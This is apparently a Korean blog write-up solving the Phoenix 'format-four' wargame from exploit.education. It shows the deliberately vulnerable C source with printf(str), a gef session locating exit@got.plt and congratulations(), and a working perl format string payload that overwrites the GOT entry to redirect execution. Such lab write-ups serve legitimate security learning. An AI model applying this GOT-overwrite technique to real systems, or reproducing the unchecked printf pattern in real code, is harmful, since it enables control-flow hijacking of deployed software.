[Phoenix] Format four

728x90

1. intro

2. code 및 분석

2.1. C code

/*
 * phoenix/format-four, by https://exploit.education
 *
 * Can you affect code execution? Once you've got congratulations() to
 * execute, can you then execute your own shell code?
 *
 * Did you get a hair cut?
 * No, I got all of them cut.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

void bounce(char *str) {
  printf(str);
  exit(0);
}

void congratulations() {
  printf("Well done, you're redirected code execution!\n");
  exit(0);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);
}

2.2. 분석

이전과 유사하지만 이번에는 congraturation 함수가 있으며 이를 실행하는 것이 목표이다.

3. 취약점 확인 및 공격 준비

3.1. 취약점

bounce 함수 내 printf. format string.

3.2. 공격 준비

특정 위치에 특정 값을 써야 한다는 점은 동일하며,

이 문제에서 특정 위치는 bounce 함수의 마지막에 exit 함수가 실행되기에 exit plt가 될 것이며,

특정 값은 cong. 함수가 될 것이다.

각각의 주소를 찾아보면 아래와 같다.

0x6009f0 <exit@got.plt>:        0x00007ffff7d8163f      0x00007ffff7d8fd2c
gef> p congratulations
$4 = {<text variable, no debug info>} 0x400644 <congratulations>

대략 아래와 같이 offset을 확인하였고

gef> r
Starting program: /opt/phoenix/amd64/format-four
Welcome to phoenix/format-four, brought to you by https://exploit.education
AAAAAAAA%p%p%p%p%p%p%p%p%p%p%p%p
AAAAAAAA0x7ffff7ffdc0c0x7ffff7ffb3000x7ffff7dc26170000x7fffffffd6800x7fffffffe6800x4006b50x7fffffffe6d80x1000000000x4141414141414141

이제 노가다 시작이다.

4. exploit

하나씩 offset과 값을 넣어가며 맞춰감.

user@phoenix-amd64:~$ (perl -e 'print "%1332c" , "%p"x20 , "%hn" , "%195068c" , "%hn" , "%131008c" , "%hn" ,"AAAAAAAAA", "\xf0\x09\x60\x00\x00\x00\x00\x00" , "BBBBBBBB" , "\xf2\x09\x60\x00\x00\x00\x00\x00" ,"CCCCCCCC", "\xf4\x09\x60\x00\x00\x00\x00\x00"') | /opt/phoenix/amd64/format-four
...
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!
Well done, you're redirected code execution!